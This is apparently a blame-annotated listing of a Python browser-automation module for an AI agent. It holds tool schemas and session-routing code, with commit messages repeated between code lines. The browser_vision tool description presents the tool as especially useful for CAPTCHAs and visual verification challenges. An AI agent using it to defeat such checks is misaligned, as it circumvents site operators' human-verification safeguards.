" description " : " The element reference from the snapshot (e.g., ' @e5 ' , ' @e12 ' ) "
}
} ,
" required " : [ " ref " ]
}
} ,
{
" name " : " browser_type " ,
" description " : " Type text into an input field identified by its ref ID. Clears the field first, then types the new text. Requires browser_navigate and browser_snapshot to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" ref " : {
" type " : " string " ,
" description " : " The element reference from the snapshot (e.g., ' @e3 ' ) "
} ,
" text " : {
" type " : " string " ,
" description " : " The text to type into the field "
}
} ,
" required " : [ " ref " , " text " ]
}
} ,
{
" name " : " browser_scroll " ,
" description " : " Scroll the page in a direction. Use this to reveal more content that may be below or above the current viewport. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" direction " : {
" type " : " string " ,
" enum " : [ " up " , " down " ] ,
" description " : " Direction to scroll "
}
} ,
" required " : [ " direction " ]
}
} ,
{
" name " : " browser_back " ,
" description " : " Navigate back to the previous page in browser history. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : { } ,
" required " : [ ]
}
} ,
{
" name " : " browser_press " ,
" description " : " Press a keyboard key. Useful for submitting forms (Enter), navigating (Tab), or keyboard shortcuts. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" key " : {
" type " : " string " ,
" description " : " Key to press (e.g., ' Enter ' , ' Tab ' , ' Escape ' , ' ArrowDown ' ) "
}
} ,
" required " : [ " key " ]
}
} ,
{
" name " : " browser_get_images " ,
" description " : " Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : { } ,
" required " : [ ]
}
} ,
{
" name " : " browser_vision " ,
2026-03-07 22:57:05 -08:00
" description " : " Take a screenshot of the current page and analyze it with vision AI. Use this when you need to visually understand what ' s on the page - especially useful for CAPTCHAs, visual verification challenges, complex layouts, or when the text snapshot doesn ' t capture important visual information. Returns both the AI analysis and a screenshot_path that you can share with the user by including MEDIA:<screenshot_path> in your response. Requires browser_navigate to be called first. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" question " : {
" type " : " string " ,
" description " : " What you want to know about the page visually. Be specific about what you ' re looking for. "
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
} ,
" annotate " : {
" type " : " boolean " ,
" default " : False ,
" description " : " If true, overlay numbered [N] labels on interactive elements. Each [N] maps to ref @eN for subsequent browser commands. Useful for QA and spatial reasoning about page layout. "
2026-01-29 06:10:24 +00:00
}
} ,
" required " : [ " question " ]
}
} ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
{
" name " : " browser_console " ,
2026-04-05 12:42:52 -07:00
" description " : " Get browser console output and JavaScript errors from the current page. Returns console.log/warn/error/info messages and uncaught JS exceptions. Use this to detect silent JavaScript errors, failed API calls, and application warnings. Requires browser_navigate to be called first. When ' expression ' is provided, evaluates JavaScript in the page context and returns the result — use this for DOM inspection, reading page state, or extracting data programmatically. " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
" parameters " : {
" type " : " object " ,
" properties " : {
" clear " : {
" type " : " boolean " ,
" default " : False ,
" description " : " If true, clear the message buffers after reading "
2026-04-05 12:42:52 -07:00
} ,
" expression " : {
" type " : " string " ,
" description " : " JavaScript expression to evaluate in the page context. Runs in the browser like DevTools console — full access to DOM, window, document. Return values are serialized to JSON. Example: ' document.title ' or ' document.querySelectorAll( \" a \" ).length ' "
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
}
} ,
" required " : [ ]
}
} ,
2026-01-29 06:10:24 +00:00
]
# ============================================================================
# Utility Functions
# ============================================================================
2026-03-07 01:14:57 -08:00
def _create_local_session ( task_id : str ) - > Dict [ str , str ] :
import uuid
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
session_name = f " h_ { uuid . uuid4 ( ) . hex [ : 10 ] } "
logger . info ( " Created local browser session %s for task %s " ,
session_name , task_id )
2026-03-07 01:14:57 -08:00
return {
" session_name " : session_name ,
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
" bb_session_id " : None ,
" cdp_url " : None ,
2026-03-07 01:14:57 -08:00
" features " : { " local " : True } ,
}
2026-03-16 06:38:20 -07:00
def _create_cdp_session ( task_id : str , cdp_url : str ) - > Dict [ str , str ] :
""" Create a session that connects to a user-supplied CDP endpoint. """
import uuid
session_name = f " cdp_ { uuid . uuid4 ( ) . hex [ : 10 ] } "
logger . info ( " Created CDP browser session %s → %s for task %s " ,
session_name , cdp_url , task_id )
return {
" session_name " : session_name ,
" bb_session_id " : None ,
" cdp_url " : cdp_url ,
" features " : { " cdp_override " : True } ,
}
2026-01-29 06:10:24 +00:00
def _get_session_info ( task_id : Optional [ str ] = None ) - > Dict [ str , str ] :
"""
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
Get or create session info for the given session key .
2026-03-07 01:14:57 -08:00
In cloud mode , creates a Browserbase session with proxies enabled .
In local mode , generates a session name for agent - browser - - session .
2026-01-31 21:42:15 -08:00
Also starts the inactivity cleanup thread and updates activity tracking .
2026-02-21 00:44:25 -08:00
Thread - safe : multiple subagents can call this concurrently .
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-01-29 06:10:24 +00:00
Args :
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
task_id : Session key . Normally the task_id as - is , but may carry the
` ` : : local ` ` suffix for the hybrid - routing local sidecar — in that
case the cloud provider is skipped even when one is configured ,
and a local Chromium session is created instead .
2026-01-29 06:10:24 +00:00
Returns :
2026-03-07 01:14:57 -08:00
Dict with session_name ( always ) , bb_session_id + cdp_url ( cloud only )
2026-01-29 06:10:24 +00:00
"""
if task_id is None :
task_id = " default "
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-01-31 21:42:15 -08:00
# Start the cleanup thread if not running (handles inactivity timeouts)
_start_browser_cleanup_thread ( )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-01-31 21:42:15 -08:00
# Update activity timestamp for this session
_update_session_activity ( task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
with _cleanup_lock :
# Check if we already have a session for this task
if task_id in _active_sessions :
return _active_sessions [ task_id ]
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Hybrid routing: session keys ending with ``::local`` force a local
# Chromium regardless of the globally-configured cloud provider. Public
# URLs in the same conversation continue to use the cloud session under
# the bare task_id key.
force_local = _is_local_sidecar_key ( task_id )
2026-03-07 01:14:57 -08:00
# Create session outside the lock (network call in cloud mode)
2026-03-16 06:38:20 -07:00
cdp_override = _get_cdp_override ( )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
if cdp_override and not force_local :
2026-03-16 06:38:20 -07:00
session_info = _create_cdp_session ( task_id , cdp_override )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
elif force_local :
session_info = _create_local_session ( task_id )
2026-03-07 01:14:57 -08:00
else :
2026-03-17 00:16:34 -07:00
provider = _get_cloud_provider ( )
if provider is None :
session_info = _create_local_session ( task_id )
else :
2026-04-16 04:19:02 -07:00
try :
session_info = provider . create_session ( task_id )
# Validate cloud provider returned a usable session
if not session_info or not isinstance ( session_info , dict ) :
raise ValueError ( f " Cloud provider returned invalid session: { session_info !r} " )
if session_info . get ( " cdp_url " ) :
# Some cloud providers (including Browser-Use v3) return an HTTP
# CDP discovery URL instead of a raw websocket endpoint.
session_info = dict ( session_info )
session_info [ " cdp_url " ] = _resolve_cdp_override ( str ( session_info [ " cdp_url " ] ) )
except Exception as e :
provider_name = type ( provider ) . __name__
logger . warning (
" Cloud provider %s failed ( %s ); attempting fallback to local "
" Chromium for task %s " ,
provider_name , e , task_id ,
exc_info = True ,
)
try :
session_info = _create_local_session ( task_id )
except Exception as local_error :
raise RuntimeError (
f " Cloud provider { provider_name } failed ( { e } ) and local "
f " fallback also failed ( { local_error } ) "
) from e
# Mark session as degraded for observability
if isinstance ( session_info , dict ) :
session_info = dict ( session_info )
session_info [ " fallback_from_cloud " ] = True
session_info [ " fallback_reason " ] = str ( e )
session_info [ " fallback_provider " ] = provider_name
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
with _cleanup_lock :
2026-03-17 04:09:16 -07:00
# Double-check: another thread may have created a session while we
# were doing the network call. Use the existing one to avoid leaking
# orphan cloud sessions.
if task_id in _active_sessions :
return _active_sessions [ task_id ]
2026-02-21 00:44:25 -08:00
_active_sessions [ task_id ] = session_info
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
